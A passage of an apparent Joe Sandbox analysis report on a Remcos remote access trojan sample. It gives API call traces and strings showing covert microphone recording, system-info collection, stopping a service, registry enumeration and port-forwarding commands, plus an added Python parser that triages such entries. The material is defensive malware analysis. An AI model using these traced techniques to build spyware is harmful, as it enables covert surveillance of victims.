                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 908c53c8f7a59e1588471b411fc3b23151cbb11a3faa38c431a8a4d25f5a2ed3
                              • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                              • Opcode Fuzzy Hash: 908c53c8f7a59e1588471b411fc3b23151cbb11a3faa38c431a8a4d25f5a2ed3
                              • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
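Entries like the one above are quick to read by eye once, but a report of this size has hundreds of them, and the interesting facts sit in the argument columns: here OpenServiceW is called with access mask 000F003F (which includes SERVICE_STOP, 0x20) and ControlService with control code 00000001, SERVICE_CONTROL_STOP, so the function stops a service by name. The parser below is an added example, not Joe Sandbox code and not part of the analysed sample. It turns the "Api.MODULE(args), ref: ADDR" bullets (with the optional "Part of subcall function ADDR:" prefix) into records, converts 8-digit hex stack values to integers, and applies a few triage rules. The two sample entries are copied from this page (the service-control function above and the ShellExecuteW/ExitProcess function earlier); the rules and the constant names are this example's own reading of those calls, and the Win32 values come from winsvc.h.

```python
"""Parse the "APIs" bullet lines of a Joe Sandbox function entry and flag
the calls a triager would look at first.

Added example; not Joe Sandbox code and not part of the analysed sample.
Each bullet has the form "Api.MODULE(args), ref: ADDR", optionally
prefixed with "Part of subcall function ADDR:". The sample entries below
are copied from this page; the flag rules are this example's own heuristics.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

LINE_RX = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")

# Win32 constants from winsvc.h and winreg.h.
SERVICE_CONTROL_STOP = 0x00000001
SERVICE_STOP = 0x00000020
HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}


@dataclass
class Call:
    api: str
    module: str
    args: List[Union[int, str]]   # 8-hex-digit stack values become ints
    ref: str                      # address of the call site
    subcall: Optional[str]        # callee address when listed as a subcall


def parse_args(raw: Optional[str]) -> List[Union[int, str]]:
    """Split the argument column; '?' and strings stay as text."""
    if not raw:
        return []
    return [int(a.strip(), 16) if HEX8.match(a.strip()) else a.strip()
            for a in raw.split(",")]


def parse_entry(text: str) -> List[Call]:
    """Return one Call per bullet line that matches the report format."""
    calls = []
    for line in text.splitlines():
        m = LINE_RX.match(line)
        if m:
            calls.append(Call(m["api"], m["mod"], parse_args(m["args"]),
                              m["ref"], m["sub"]))
    return calls


def flag_entry(calls: List[Call]) -> List[str]:
    """Heuristics over one function's calls; each string is one finding."""
    findings = []
    direct = {c.api for c in calls if c.subcall is None}
    for c in calls:
        a = c.args
        if c.api == "ControlService" and len(a) > 1 and a[1] == SERVICE_CONTROL_STOP:
            findings.append(f"{c.ref}: ControlService(SERVICE_CONTROL_STOP) stops a service")
        if (c.api.startswith("OpenService") and len(a) > 2
                and isinstance(a[2], int) and a[2] & SERVICE_STOP):
            findings.append(f"{c.ref}: OpenService asks for SERVICE_STOP access (0x{a[2]:X})")
        if c.api.startswith("RegOpenKeyEx") and a and isinstance(a[0], int) and a[0] in HIVES:
            findings.append(f"{c.ref}: opens a key under {HIVES[a[0]]}")
    if "ExitProcess" in direct and {"ShellExecuteW", "ShellExecuteExA"} & direct:
        findings.append("launches another program via ShellExecute and then exits itself")
    return findings


# Copied from the service-control entry on this page.
SAMPLE_SERVICE_STOP = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
"""

# Copied from the ShellExecuteW / ExitProcess entry earlier on this page.
SAMPLE_SELF_REPLACE = """
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
• ExitProcess.KERNEL32 ref: 0040C832
"""

if __name__ == "__main__":
    for sample in (SAMPLE_SERVICE_STOP, SAMPLE_SELF_REPLACE):
        for finding in flag_entry(parse_entry(sample)):
            print(finding)
```

Paste any "APIs" entry from the report into parse_entry; the argument column is the stack as seen at the call, so the first values map onto the API's parameters in order and later values are whatever the caller left on the stack, which is why the rules above only look at the leading positions.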
                              APIs
                              • _free.LIBCMT ref: 00446DDF
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 00446DEB
                              • _free.LIBCMT ref: 00446DF6
                              • _free.LIBCMT ref: 00446E01
                              • _free.LIBCMT ref: 00446E0C
                              • _free.LIBCMT ref: 00446E17
                              • _free.LIBCMT ref: 00446E22
                              • _free.LIBCMT ref: 00446E2D
                              • _free.LIBCMT ref: 00446E38
                              • _free.LIBCMT ref: 00446E46
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                              • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                              • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                              • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                              Strings
                              • DisplayName, xrefs: 0041B8D1
                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B83C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnumOpen
                              • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                              • API String ID: 1332880857-3614651759
                              • Opcode ID: 7508191cb52aa9fc353c449c1f5afcd7963d8d9ef058f972d88bedc8c1be360d
                              • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                              • Opcode Fuzzy Hash: 7508191cb52aa9fc353c449c1f5afcd7963d8d9ef058f972d88bedc8c1be360d
                              • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Eventinet_ntoa
                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                              • API String ID: 3578746661-4192532303
                              • Opcode ID: 0d3f72b4862548af90ea2b902a190bfca7b75d93e0c06f9e40b9838ab347fbb0
                              • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                              • Opcode Fuzzy Hash: 0d3f72b4862548af90ea2b902a190bfca7b75d93e0c06f9e40b9838ab347fbb0
                              • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • Sleep.KERNEL32(00000064), ref: 00416688
                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CreateDeleteExecuteShellSleep
                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                              • API String ID: 1462127192-2001430897
                              • Opcode ID: d375238ffbdedef1dde6657c06b39fad1c3bbdc79052b82f4ca783474d06c829
                              • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                              • Opcode Fuzzy Hash: d375238ffbdedef1dde6657c06b39fad1c3bbdc79052b82f4ca783474d06c829
                              • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                              APIs
                              • _strftime.LIBCMT ref: 00401AD3
                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                              • API String ID: 3809562944-3643129801
                              • Opcode ID: 89ccb3b3af48ec40c189566ce4319a944db1d9faa1adeed037c9ba1adf873a40
                              • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                              • Opcode Fuzzy Hash: 89ccb3b3af48ec40c189566ce4319a944db1d9faa1adeed037c9ba1adf873a40
                              • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                              APIs
                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                              • waveInStart.WINMM ref: 00401A81
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                              • String ID: XCG$`=G$x=G
                              • API String ID: 1356121797-903574159
                              • Opcode ID: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                              • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                              • Opcode Fuzzy Hash: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                              • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                              • TranslateMessage.USER32(?), ref: 0041C9FB
                              • DispatchMessageA.USER32(?), ref: 0041CA05
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                              • String ID: Remcos
                              • API String ID: 1970332568-165870891
                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                              • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                              • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                              • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                              • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                              • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                              APIs
                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                              • __alloca_probe_16.LIBCMT ref: 00452C91
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                              • __alloca_probe_16.LIBCMT ref: 00452D3B
                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                              • __freea.LIBCMT ref: 00452DAA
                              • __freea.LIBCMT ref: 00452DB6
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                              • String ID:
                              • API String ID: 201697637-0
                              • Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                              • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                              • Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                              • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                              • _free.LIBCMT ref: 00444714
                              • _free.LIBCMT ref: 0044472D
                              • _free.LIBCMT ref: 0044475F
                              • _free.LIBCMT ref: 00444768
                              • _free.LIBCMT ref: 00444774
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorLast$_abort_memcmp
                              • String ID: C
                              • API String ID: 1679612858-1037565863
                              • Opcode ID: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                              • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                              • Opcode Fuzzy Hash: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                              • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: tcp$udp
                              • API String ID: 0-3725065008
                              • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                              • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                              • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                              • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                              APIs
                              • ExitThread.KERNEL32 ref: 004017F4
                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                              • String ID: Ho]$p[G$>G$>G
                              • API String ID: 1596592924-3585548411
                              • Opcode ID: a14ce8dca8c50f9d7d6b9dcd202626e44b251b874e1b71026016f31bc5760569
                              • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                              • Opcode Fuzzy Hash: a14ce8dca8c50f9d7d6b9dcd202626e44b251b874e1b71026016f31bc5760569
                              • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                              APIs
                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
